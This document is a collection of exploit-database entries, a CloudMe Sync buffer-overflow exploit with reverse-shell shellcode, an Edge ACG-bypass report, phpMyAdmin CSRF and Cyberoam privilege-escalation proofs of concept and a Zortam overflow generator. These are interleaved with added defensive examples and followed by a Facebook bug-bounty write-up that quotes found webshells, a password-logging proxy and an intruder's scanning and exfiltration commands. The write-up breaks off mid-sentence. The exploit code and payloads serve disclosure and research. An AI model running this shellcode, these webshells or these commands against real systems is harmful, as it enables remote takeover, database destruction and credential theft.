#######################################################
# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1110.exe
# Category: Local
# Exploit Discovery: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 1.11.0
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2018-7886
# Solution: Update CloudMe Sync to 1.11.2
#######################################################
#Disclosure Date: March 12, 2018
#Response Date: March 14, 2018
#Bug Fixed: April 12, 2018
# Run this file on the victim's Windows 7 SP1 x86 system where CloudMe Sync 1.11.0 is installed.
import socket
target="127.0.0.1"
junk="A"*1052
eip="\x7B\x8A\xA9\x68" #68a98a7b : JMP ESP - Qt5Core.dll
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c
shellcode=("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x02\x01\x68"
"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
payload=junk+eip+shellcode
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
Each Edge Content process (MicrosoftEdgeCP.exe) needs to call SetProcessMitigationPolicy() on itself to enable ACG. The callstack when this happens is:
00 KERNELBASE!SetProcessMitigationPolicy
01 MicrosoftEdgeCP!SetProcessDynamicCodePolicy+0xc0
02 MicrosoftEdgeCP!StartContentProcess_Exe+0x164
03 MicrosoftEdgeCP!main+0xfe
04 MicrosoftEdgeCP!_main+0xa6
05 MicrosoftEdgeCP!WinMainCRTStartup+0x1b3
06 KERNEL32!BaseThreadInitThunk+0x14
07 ntdll!RtlUserThreadStart+0x21
The issue is that one MicrosoftEdgeCP.exe can OpenProcess() another MicrosoftEdgeCP.exe as long as they are in the same App Container. So MicrosoftEdgeCP.exe process A can race MicrosoftEdgeCP.exe B when it still doesn't have ACG enabled and tamper with it in such a way that process B never enables ACG.
Having another MicrosoftEdgeCP.exe process not enable ACG is pretty straightforward as SetProcessDynamicCodePolicy consults a number of global variables to determine if ACG should be enabled or not. For example, in IEIsF12Host(), which is called from GetDynamicCodeRestrictionsEnablementState, two global variables (at offsets 0x23092 and 0x23090 in the Edge version we tested on, up-to-date on Windows 10 version 1709) are checked, and if they are both nonzero, ACG is not going to get enabled. Thus it is sufficient for process A to OpenProcess() and call a single WriteProcessMemory() with a known address (note: we assume ASLR is already defeated at this point) in order to disable ACG.
When process A disables ACG in process B it is possible to further tamper with process B and get it to allocate executable memory and run arbitrary payload either in process A or process B.
A debug log below demonstrates how it is indeed possible to OpenProcess() and WriteProcessMemory() from one MicrosoftEdgeCP.exe to another. All that is left to prove is that this race is winnable. To demonstrate that, we wrote a small program that scans the processes and whenever a new MicrosoftEdgeCP.exe appears, it patches it as described above. In our experiments this reliably disables ACG for all of the MicrosoftEdgeCP.exe processes created after the PoC program runs. The Visual Studio project for the PoC is attached. It is also possible to run the PoC in Edge's App Container, which proves that an Edge Content Process has access to all of the functionality needed to exploit the issue.
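The report above turns on a process's having to enable ACG for itself after start-up. A defender-side check for that condition, added here as an example (not Project Zero's PoC), is to ask each running content process whether ProcessDynamicCodePolicy is actually enforced, through GetProcessMitigationPolicy(), which needs only PROCESS_QUERY_LIMITED_INFORMATION on the target. The SDK constants and the bit layout are the documented ones; the tasklist CSV parsing assumes the PID is the second column, and the Win32 calls only run on Windows, while the flag decoding is plain Python.

```python
"""Audit whether running processes actually have Arbitrary Code Guard (ACG)
enforced, by querying the ProcessDynamicCodePolicy mitigation with
GetProcessMitigationPolicy(). Added example for the report above; it is not
Project Zero's PoC and does not need write access to the target process."""
import csv
import ctypes
import io
import subprocess
import sys

# Constants from the Windows SDK (processthreadsapi.h / winnt.h).
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_DYNAMIC_CODE_POLICY = 2   # PROCESS_MITIGATION_POLICY: ProcessDynamicCodePolicy

# Bit layout of PROCESS_MITIGATION_DYNAMIC_CODE_POLICY.Flags (winnt.h).
DYNAMIC_CODE_BITS = (
    ("ProhibitDynamicCode", 0),
    ("AllowThreadOptOut", 1),
    ("AllowRemoteDowngrade", 2),
    ("AuditProhibitDynamicCode", 3),
)


def decode_dynamic_code_policy(flags):
    """Map the raw Flags DWORD to named booleans."""
    return {name: bool((flags >> bit) & 1) for name, bit in DYNAMIC_CODE_BITS}


def acg_enforced(flags):
    """ACG blocks dynamic code only when ProhibitDynamicCode is set and the
    policy is not running in audit-only mode."""
    policy = decode_dynamic_code_policy(flags)
    return policy["ProhibitDynamicCode"] and not policy["AuditProhibitDynamicCode"]


def query_dynamic_code_flags(pid):
    """Windows only: read another process's ProcessDynamicCodePolicy flags."""
    if sys.platform != "win32":
        raise OSError("GetProcessMitigationPolicy is only available on Windows")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.GetProcessMitigationPolicy.restype = ctypes.c_int
    k32.GetProcessMitigationPolicy.argtypes = [
        ctypes.c_void_p, ctypes.c_int, ctypes.POINTER(ctypes.c_uint32), ctypes.c_size_t]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]

    handle = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        flags = ctypes.c_uint32(0)
        if not k32.GetProcessMitigationPolicy(handle, PROCESS_DYNAMIC_CODE_POLICY,
                                              ctypes.byref(flags), ctypes.sizeof(flags)):
            raise ctypes.WinError(ctypes.get_last_error())
        return flags.value
    finally:
        k32.CloseHandle(handle)


def pids_for_image(image_name):
    """PIDs of every running instance of image_name, via tasklist's CSV output
    ("Image Name","PID",...); the PID is assumed to be the second column."""
    out = subprocess.check_output(
        ["tasklist", "/FI", f"IMAGENAME eq {image_name}", "/FO", "CSV", "/NH"],
        text=True)
    return [int(row[1]) for row in csv.reader(io.StringIO(out))
            if len(row) > 1 and row[1].isdigit()]


def audit(image_name="MicrosoftEdgeCP.exe"):
    """Return (pid, acg_enforced_or_None, decoded_flags) for each instance."""
    results = []
    for pid in pids_for_image(image_name):
        try:
            flags = query_dynamic_code_flags(pid)
            results.append((pid, acg_enforced(flags), decode_dynamic_code_policy(flags)))
        except OSError as err:
            results.append((pid, None, {"error": str(err)}))
    return results


if __name__ == "__main__":
    for pid, enforced, detail in audit(*sys.argv[1:2]):
        print(f"{pid:>6}  {'ACG on ' if enforced else 'ACG OFF'}  {detail}")
```

A content process that shows ACG OFF after it has finished starting is exactly the state the race leaves behind; a policy applied at process creation (by the parent, before any code in the child runs) cannot be raced in this way.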
To demonstrate that two MicrosoftEdgeCP.exe processes can tamper with each other, select two processes in the same App Container (all Content Processes for Internet sites should be in the same container) and attach a debugger to one of them.
0:061> r rip=kernelbase!openprocess
0:061> r rcx=28 # PROCESS_VM_WRITE | PROCESS_VM_OPERATION
0:061> r rdx=0
0:061> r r8=e84 # pid of the other process
0:061> p
...
After OpenProcess() completes we can see that it was successful and that the returned handle has the value of 0x698.
0:061> r
rax=0000000000000698 rbx=0000000000000000 rcx=00007ff87c720344
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=00007ff878c8dc6d rsp=00000082622dfe28 rbp=0000000000000000
r8=00000082622dfdb8 r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
Then, we can test writing to the other process's memory with
0:061> r rip=kernelbase!writeprocessmemory
0:061> r rcx=698 # handle returned from OpenProcess()
0:061> r rdx=00007ff7`b8483090 # base of MicrosoftEdgeCP.exe + 0x23090
0:061> r r8=00000082`622dfef0 # address of buffer to write
0:061> r r9=3 # size of data to write
0:061> p
...
After it completes we see that the return value is 1 which indicates success:
0:061> r
rax=0000000000000001 rbx=0000000000000000 rcx=0000000000000000
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=00007ff878cca1d6 rsp=00000082622dfe28 rbp=0000000000000000
r8=00000082622dfcf8 r9=00000082622dfdd1 r10=0000000000000000
r11=0000000000000246 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
You can also attach a debugger to the other process and verify that the data was written correctly.
Microsoft's reply: "First, thank you for reporting this to us. Our engineering team does agree with your assessment. The approach we are taking to address this issue is moving the enablement of ACG to process creation time rather than deferring until after the process has started. Our plan of action would be not to address it through a hotfix, but instead in the next release of Windows."
Regarding severity, as with the other mitigation bypasses, note that this issue can't be exploited on its own. An attacker would first need to exploit an unrelated vulnerability to gain some capabilities in the Edge content process (such as the ability to read and write arbitrary memory locations), after which they could use this vulnerability to gain additional capabilities (namely, the ability to run arbitrary machine code).
The issue was identified by James Forshaw and Ivan Fratric.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44467.zip
# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
# Date: 2018-04-20
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh & @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps
#1. Description
#The vulnerability exists due to a failure of the "/sql.php" script to properly verify the source of the HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statements by sending a malicious request to a logged-in user.
#2. Proof of Concept: This example sends a crafted HTTP GET request in order to drop the specified database.
<html>
<body>
<a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
Drop database
</a>
</body>
</html>
#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188
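The check the advisory says /sql.php lacked, shown as an added example that is not phpMyAdmin's code: the request dicts and the in-memory session store are constructed for illustration, and the handler names are hypothetical. The vulnerable form runs any query that arrives with a valid session; the hardened form additionally requires POST and a per-session token that a cross-site page cannot read.

```python
"""Anti-CSRF check of the kind the advisory above says /sql.php lacked.
Added example, not phpMyAdmin's code: the request dicts and the in-memory
session store are constructed for illustration."""
import hmac
import secrets

SESSIONS = {}  # constructed session store: session id -> session data


def new_session():
    """Log a user in and mint a per-session CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_hex(32)}
    return sid


def vulnerable_sql_handler(request):
    """The flawed pattern: any request carrying a valid session cookie runs the
    query, so a cross-site <a href> or <img src> from another origin suffices."""
    if request["session"] not in SESSIONS:
        return 401, "not logged in"
    return 200, "executed: " + request["params"].get("sql_query", "")


def hardened_sql_handler(request):
    """Same handler with the two checks a state-changing endpoint needs:
    the query must be POSTed and must carry the session's CSRF token."""
    session = SESSIONS.get(request["session"])
    if session is None:
        return 401, "not logged in"
    if request["method"] != "POST":
        return 405, "state-changing SQL must be sent with POST"
    supplied = request["params"].get("token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied.encode(), session["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    return 200, "executed: " + request["params"].get("sql_query", "")


def csrf_link_request(sid, sql):
    """Model of the PoC's GET link followed by a logged-in browser: the session
    cookie is sent automatically, the token is not, because the attacker's
    page cannot read it."""
    return {"method": "GET", "session": sid, "params": {"sql_query": sql}}


def legitimate_request(sid, sql):
    """A form submitted from the application's own page carries the token."""
    return {"method": "POST", "session": sid,
            "params": {"sql_query": sql, "token": SESSIONS[sid]["csrf_token"]}}


if __name__ == "__main__":
    sid = new_session()
    forged = csrf_link_request(sid, "DROP DATABASE [DBNAME]")
    print("vulnerable:", vulnerable_sql_handler(forged))
    print("hardened:  ", hardened_sql_handler(forged))
    print("legitimate:", hardened_sql_handler(legitimate_request(sid, "SELECT 1")))
```

The token must be bound to the session and compared in constant time; checking only that a session cookie is present is what makes the GET link in the PoC sufficient.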
# Exploit Title: Sophos Cyberoam UTM - Privilege Escalation
# Date: 31/08/2016
# Exploit Author: Chintan Gurjar (Frogy)
# Vendor Homepage: http://www.sophos.com/
# Software Link: https://www.cyberoam.com/downloads/datasheet/CR25iNG.html
# Version: Cyberoam CR25iNG - 10.6.3 MR-5
# CVE : CVE-2016-7786
# Category : Webapps
# CVSS Score: 9.3
Description
===========
A vulnerability, which was classified as critical, has been found in Sophos Cyberoam UTM CR25iNG 10.6.3 MR-5. This issue affects an unknown function of the file LicenseInformation.jsp of the component Access Restriction. Manipulation with unknown input leads to a privilege-escalation vulnerability. Using CWE to declare the problem leads to CWE-264. Confidentiality, integrity, and availability are impacted.
The weakness was released 04/07/2017. The advisory is available for download at infosecninja.blogspot.in. This vulnerability has been identified as CVE-2016-7786 since 09/09/2016. The attack may be initiated remotely. Successful exploitation requires a single authentication. Technical details of the vulnerability are known.
Upgrading to version 10.6.5 eliminates this vulnerability.
Steps to reproduce
===================
1. Log in with the admin user account.
2. Navigate to the dashboard and observe all GET URLs through the Burp proxy. Save the URLs.
3. Log out and log in with a low-privileged user account that has no read, write or execute permissions.
4. Access the saved admin-functionality URLs with the low-privileged user account.
5. Access the admin information from the user account.
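The root cause behind these steps is that the dashboard pages check only for a valid session, not for the caller's permissions. The following is an added example, not Cyberoam's code: the accounts, the permission names (modelled on the read/write/execute levels mentioned above) and the route table are constructed for illustration, and the function names are hypothetical. It shows the flawed dispatch beside a deny-by-default one, plus a replay check that returns the pages a low-privileged session can still render.

```python
"""Server-side authorization check of the kind the dashboard JSPs above are
missing. Added example, not Cyberoam's code: accounts, permissions and the
route table are constructed for illustration."""

# Constructed accounts; permissions model the read/write/execute levels the
# steps above mention. The low-privileged user holds none of them.
USERS = {
    "admin": {"permissions": {"read", "write", "execute"}},
    "lowpriv": {"permissions": set()},
}

# Deny-by-default route table: every admin page names the permission it
# requires. A page missing from the table is refused, not silently exposed.
ROUTES = {
    "/corporate/webpages/dashboard/LicenseInformation.jsp": "read",
    "/corporate/webpages/dashboard/ApplianceInformation.jsp": "read",
    "/corporate/webpages/dashboard/IPSRecentAlerts.jsp": "read",
    "/corporate/webpages/dashboard/HTTPVirusDetected.jsp": "read",
    "/corporate/webpages/index.php": None,   # any authenticated user
}

# Constructed session ids -> user names.
SESSIONS = {"sess-lowpriv": "lowpriv", "sess-admin": "admin"}
LOGIN_PAGE = "/corporate/webpages/index.php"


def vulnerable_dispatch(path, session_id):
    """The flawed pattern: a valid session is all that is checked, so any
    authenticated account can fetch an admin page by URL."""
    if session_id not in SESSIONS:
        return 302, LOGIN_PAGE
    return 200, f"rendered {path}"


def hardened_dispatch(path, session_id):
    """Authenticate, then authorise this path for this user."""
    user = SESSIONS.get(session_id)
    if user is None:
        return 302, LOGIN_PAGE                        # not logged in
    if path not in ROUTES:
        return 404, "unknown page"                    # deny by default
    required = ROUTES[path]
    if required is not None and required not in USERS[user]["permissions"]:
        return 403, f"{user} lacks '{required}' for {path}"
    return 200, f"rendered {path}"


def audit_routes(dispatch, session_id):
    """Replay every admin page with one session and return those that render.
    With a low-privileged session this is the regression test for the bypass
    described above; the expected result is an empty list."""
    return [path for path, required in ROUTES.items()
            if required is not None and dispatch(path, session_id)[0] == 200]


if __name__ == "__main__":
    print("vulnerable, lowpriv:", audit_routes(vulnerable_dispatch, "sess-lowpriv"))
    print("hardened,   lowpriv:", audit_routes(hardened_dispatch, "sess-lowpriv"))
    print("hardened,   admin:  ", audit_routes(hardened_dispatch, "sess-admin"))
```

Keeping the required permission next to the route, and refusing anything not listed, is what prevents a new dashboard page from shipping with the same omission.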
Video Demonstration
====================
https://www.youtube.com/watch?v=unV3-DdIxXw&t=2s
PoC
===============
Request:
GET /corporate/webpages/dashboard/LicenseInformation.jsp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.1/corporate/webpages/index.php
Cookie: JSESSIONID=120g9lzj467ivba7uvbf9ej73
Connection: close
Response:
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2016 06:59:56 GMT
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=2592000
Expires: Fri, 30 Sep 2016 06:59:56 GMT
Vary: Accept-Encoding
Content-Length: 1828
Connection: Close
...
<table width="100%" cellpading="1" cellspacing="1">
<tr>
<td class="tableheader_gadget" align="center"><label
id='Language.Time'></label></td>
<td class="tableheader_gadget" align="center"><label
id='Language.User'></label></td>
...
Affected URLs
===============
http://192.168.1.1/corporate/webpages/dashboard/ApplianceInformation.jsp
http://192.168.1.1/corporate/webpages/dashboard/IPSRecentAlerts.jsp
http://192.168.1.1/corporate/webpages/dashboard/HTTPVirusDetected.jsp
...Many others...
References
===============
https://infosecninja.blogspot.co.nz/2017/04/cve-2016-7786-sophos-cyberoam-utm.html
https://vuldb.com/?id.99371
https://www.cvedetails.com/cve/CVE-2016-7786/
https://nvd.nist.gov/vuln/detail/CVE-2016-7786
#!/usr/bin/python
# Title: Zortam Mp3 Media Studio Local Buffer Overflow (SEH)
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: http://www.zortam.com/
# Version: 23.45
# Tested on: Windows 7 32 bit
# Date: 12/04/2018
# Vendor did not respond to advisory
# File > Add Disk to Mp3 Library > paste the string from zortamPOC.txt into the directory field
filename="zortamPOC.txt"
junk = "A" * 268
nseh = "B" * 4
seh="C" * 4
fill = "D" *900
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
0x00 Preface
As a penetration tester, I prefer server-side attacks to client-side weaknesses. Being able to control the server directly and get a shell to work with is satisfying. Of course, in a complete penetration no kind of weakness can be underestimated; in a real engagement, client-side vulnerabilities may have to be combined to get fuller control of the server. Still, when hunting for weaknesses I prefer to go straight at the server and look for the ones that are dangerous and can drive the server directly. Since Facebook is ever more popular worldwide and has ever more users, I had long had the idea of trying to penetrate it. It so happened that Facebook started its Bug Bounty program in 2012, which made me even more interested in trying.
Generally speaking, from a penetration point of view, the habit is to start with gathering information and reconnaissance. First define how large the target's "scope" on the Internet is, so that you can assess where you have a chance to start. For example:
What information can Google hacking turn up?
How many IP addresses does it have in a class B range? How many in class C ranges?
Whois? Reverse whois?
Which domain names does it have? Which domain names are used internally? Then guess and scan subdomains.
Which technologies and equipment does the company usually like to use?
Has any information leaked on GitHub or Pastebin?
...and so on
Of course, in a Bug Bounty you cannot attack without limits. The intersection of the scope the Bug Bounty allows and the scope you discover is the real target you can try.
Generally speaking, here are a few examples of problems that tend to arise when penetrating a large company.
For most large companies the "network boundary" is harder to keep track of and is prone to problems. The larger the company and the more machines it has online, thousands or tens of thousands, the harder it is for administrators to account for every one. In attack and defence, the defender has to cover every side, while the attacker only needs to find one point to break through. So, compared with the defender, attackers only need to find one machine on the network boundary, get into the intranet, and start penetrating from there!
Security awareness around "network devices" is relatively weak. Network devices usually do not give administrators a shell for further operations, so they can only be configured through the interface the device itself provides. As a result, such a device is usually defended only at the network layer, and when a 0-day or 1-day in the device itself turns up it can be compromised without anyone even noticing.
With the rise of "social-engineering databases" (collections of leaked credentials), the penetration process can sometimes become very simple: find the company's employee list from public information, then look in those databases for the password of an employee who can log in to the VPN, and start penetrating the intranet. Especially as the number of such databases grows and "quantity turns into quality", as long as a key person's password is in one of them, the company's security is completely broken.
When looking for Facebook weaknesses, I followed the usual penetration approach. Besides querying Facebook's own domain names, when starting to gather information I did a reverse lookup on the registered e-mail address and accidentally discovered an interesting domain name:
tfbnw.net
TFBNW seems to be the abbreviation of "TheFaceBook Network".
Then, from public information, the following server turned out to exist:
vpn.tfbnw.net
Whoa! vpn.tfbnw.net looks like a Juniper SSL VPN login interface, but its version is the latest and there are no directly exploitable weaknesses; still, this is also a way into the internal story.
TFBNW seems to be a domain name Facebook uses internally. What happens if we scan the same network segment as vpn.tfbnw.net?
Mail server Outlook Web App
F5 BIGIP SSL VPN
Cisco ASA SSL VPN
Oracle E-Business
MobileIron MDM
From these machines we can roughly judge that this network segment should be a relatively important one for Facebook, and the whole story starts from here.
0x01 Initial vulnerability discovery
In the same network segment, a special server was found:
files.fb.com
The files.fb.com login interface
Judging from the logo and the footer, it should be Accellion's Secure File Transfer (hereafter FTA).
FTA is a product for securing document transfers: it lets users share and synchronise documents online, and it can integrate single sign-on mechanisms such as AD, LDAP and Kerberos. The enterprise edition also supports an SSL VPN service.
The first thing I did with FTA was to search the Internet for any public exploit that could be used. An exploit had recently been discovered by HD Moore and published on Rapid7:
Accellion File Transfer Appliance Vulnerabilities (CVE-2015-2856, CVE-2015-2857)
From that advisory, one can directly tell whether the target is exploitable from the version information leaked at "/tws/getstatus". By the time files.fb.com was found, the version had already been upgraded from the vulnerable 0.18 to 0.20. However, the code leaked in the advisory gave a feel for FTA's coding style, and it seemed that if one kept exploring there might still be problems. So the strategy became: go and look for a 0-day in the FTA product!
But no problem could be found with actual black-box methods, so I had to find a way to switch to white-box testing. After obtaining the original FTA code by various means, the investigation could finally start!
The general architecture of the whole FTA product:
The web interface consists mainly of Perl and PHP
The original PHP code is encrypted with IonCube
Many daemons written in Perl run inside the product
First, decrypt the IonCube part. To keep their product from leaking, many devices encrypt their original code. Fortunately, the IonCube version used by FTA is not the latest, so it could be decrypted with ready-made tools. However, due to PHP version differences, some details and numeric operations may need to be repaired by hand.
After a simple source-code audit, it turned out that all of the easy weaknesses had already been found by Rapid7.
Vulnerabilities that require authentication are not very useful, so I had to dig deeper!
After several days of careful investigation, a total of seven vulnerabilities were found:
Cross-Site Scripting x 3
Pre-Auth SQL Injection leading to Remote Code Execution
Known Secret Key leading to Remote Code Execution
Local Privilege Escalation x 2
Besides reporting the vulnerabilities to the Facebook security team, the remaining vulnerabilities were also written up as an advisory and submitted to Accellion's technical contact. After the vendor had patched them and the submission had gone through CERT/CC, four CVE numbers were obtained:
CVE-2016-2350
CVE-2016-2351
CVE-2016-2352
CVE-2016-2353
Detailed vulnerability information will be published after the full-disclosure policy period!
Using the Pre-Auth SQL Injection to write a WebShell
During a real penetration, the first thing to do after getting into a server is to check whether the current environment is favourable to you. To keep persistent access to the server, you need to understand as far as possible what restrictions and logging exist on it, and avoid the risk of being discovered :p
Facebook had roughly the following restrictions:
The firewall cannot connect out to external networks, TCP or UDP, on 53, 80 or 443
There is a remote syslog server
auditd logging is turned on
Not being able to connect out seems a bit troublesome, and an ICMP tunnel looks feasible, but this is just a Bug Bounty program; there is really no need to go to that much trouble, so everything was operated purely through the WebShell.
0x02 The penetration-test process
While collecting evidence of the vulnerability to report to the Facebook security team, some strange traces turned up in the web logs.
First, strange PHP error messages appeared in "/var/opt/apache/php_error_log"; they looked like errors caused by someone having modified the code.
PHP error log
Following the paths in the error messages, I found a suspicious WebShell backdoor left by an earlier visitor.
WebShell on the Facebook server
The contents of some of the files are as follows:
sshpass
Yes, that sshpass.
bn3d10aw.php
<?php echo shell_exec($_GET['c']);
uploader.php
<?php move_uploaded_file($_FILES['f']['tmp_name'], basename($_FILES['f']['name']));
d.php
<?php include_once('/home/seos/courier/remote.inc'); echo decrypt($_GET['c']);
sclient_user_class_standard.inc
<?php
include_once('sclient_user_class_standard.inc.orig');
$fp = fopen('/home/seos/courier/b3dke9sqaa0l.log', 'a');
$retries = 0;
$max_retries = 100;
// ...omitted
fwrite($fp, date('Y-m-d H:i:s T') . ';' . $_SERVER['REMOTE_ADDR'] . http_build_query($_GET) . ...
// ...omitted
The first few are very standard PHP trojans.
The more special one is the file "sclient_user_class_standard.inc".
It include_onces "sclient_user_class_standard.inc.orig", the PHP program that originally verified the password, so the hacker built a proxy in the middle that records the GET, POST and Cookie values whenever an important operation is performed.
To sum up: the hacker placed a proxy at the password-verification point, recorded the account passwords of Facebook employees, stored the recorded passwords under the web directory, and retrieved them from time to time with wget:
wget https://files.fb.com/courier/b3dke9sqaa0l.log
Recorded passwords
From the log records, besides user account passwords there was also e-mail content from FTA files. The recorded account passwords rotate periodically (more on this later, but this is still XD).
The last rotation, recorded from 2/1 to 2/7, turned out to contain about 300 account and password records, most of them "@fb.com" or "@facebook.com" employee accounts and passwords. This problem is a bit serious. In FTA there are two main modes for users to log in:
Ordinary self-registered users: their password hash exists in the database, stored as SHA256 + salt
Facebook employees (@fb.com) use unified authentication, authenticating against AD via LDAP
In this log record, real employee account passwords were leaked. **Guessing** that these account passwords could access Facebook's mail OWA, VPN and other services to penetrate further...
Furthermore, this "hacker" may not have been all that experienced :p
All backdoor parameters were passed via GET, so their footprints are clearly visible in the web logs.
The hacker did not take stderr into account when running some commands, so the error output of many commands ended up in the web logs, and from it we can see what operations the hacker performed.
The hacker cleared the recorded account passwords every few days, which can be observed from access.log:
192.168.54.13 - 17955 [23/Jan/2016:19:04:10 +0000 | 1453575850] "GET /courier/custom_template/1000/bn3dl0aw.php?c=./sshpass -p '*********' ssh -v -o StrictHostKeyChecking=no soggycat@localhost 'cp /home/seos/courier/b3dke9sqaa0l.log /home/seos/courier/b3dke9sqaa0l.log.2; echo > /home/seos/courier/b3dke9sqaa0l.log' 2>/dev/stdout HTTP/1.1" 200 2559 ...
Packaging files:
cat tmp_list3_2 | while read line; do cp /home/filex2/1000/$line files; done 2>/dev/stdout
tar -czvf files.tar.gz files
Probing the internal network structure:
dig archibus.thefacebook.com
telnet archibus.facebook.com 80
curl http://archibus.thefacebook.com/spaceview_facebook/locator/room.php
dig records.fb.com
telnet records.fb.com 80
telnet records.fb.com 443
wget -O- -q http://192.168.41.16
dig acme.facebook.com
./sshpass -p '*********' ssh -v -o StrictHostKeyChecking=no soggycat@localhost 'for i in $(seq 201 1 255); do for j in $(seq 0 1 255); do echo "192.168.$i.$j:`dig +short ptr $j.$i.168.192.in-addr.arpa`"; done; done' 2>/dev/stdout
...
Scanning the intranet with a shell script, but forgetting to clean up stderr
Trying to connect to the internal LDAP:
sh: -c: line 0: syntax error near unexpected token `('
sh: -c: line 0: `ldapsearch -v -x -H ldaps://ldap.thefacebook.com -b CN=svc-accellion,OU=Service Accounts,DC=thefacebook,DC=com -w '*********
Trying to access internal network resources:
(It looks like the mail OWA could be reached directly...)
--20:38:09--  https://mail.thefacebook.com/
Resolving mail.thefacebook.com... 192.168.52.37
Connecting to mail.thefacebook.com|192.168.52.37|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://mail.thefacebook.com/owa/ [following]
--20:38:10--  https://mail.thefacebook.com/owa/
Reusing existing connection to mail.thefacebook.com:443.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/&reason=0 [following]
--20:38:10--  https://mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/&reason=0
Reusing existing connection to mail.thefacebook.com:443.
HTTP request sent, awaiting response... 200 OK
Length: 8902 (8.7K) [text/html]
Saving to: `STDOUT'
 0K ........                                              100% 1.17G=0s
20:38:10 (1.17 GB/s) - `-' saved [8902/8902]
--20:38:33--  (try:15)  https://10.8.151.47/
Connecting to 10.8.151.47:443... --20:38:51--  https://svn.thefacebook.com/
Resolving svn.thefacebook.com... failed: Name or service not known.
--20:39:03--  https://sb-dev.thefacebook.com/
Resolving sb-dev.thefacebook.com... failed: Name or service not known.
failed: Connection timed out.
Retrying.
Trying to steal the SSL private key:
